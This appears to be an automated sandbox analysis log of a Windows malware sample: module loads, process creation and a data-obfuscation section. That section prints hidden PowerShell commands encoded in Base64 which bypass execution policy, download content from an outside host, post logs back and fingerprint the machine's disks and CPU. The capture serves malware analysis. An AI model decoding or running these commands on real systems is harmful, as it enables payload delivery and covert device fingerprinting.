        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winsta.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: userenv.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: profapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: sspicli.dll
        Source: C:\Windows\regedit.exeSection loaded: authz.dll
        Source: C:\Windows\regedit.exeSection loaded: aclui.dll
        Source: C:\Windows\regedit.exeSection loaded: ulib.dll
        Source: C:\Windows\regedit.exeSection loaded: clb.dll
        Source: C:\Windows\regedit.exeSection loaded: uxtheme.dll
        Source: C:\Windows\regedit.exeSection loaded: ntdsapi.dll
        Source: C:\Windows\regedit.exeSection loaded: xmllite.dll
        Source: C:\Windows\regedit.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\systeminfo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: .pdbpdbtem.pdbD source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.3074920696.0000015B6D4E2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: b.pdb- source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("WmxibVJsY2lJZ2ZRMEtEUW9qSUVOb1pXTnJJR2xtSUdGdWVTQnZkR2hsY2lCaGJuUnBkbWx5ZFhNZ2MyOW1kSGRoY21VZ2FYTWdhVzV6ZEdGc2JHVmtEUW9rYjNSb1pYSkJiblJwZG1seWRYTWdQU0JIWlhRdFYyMXBUMkpxWldOMElDMU9ZVz
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
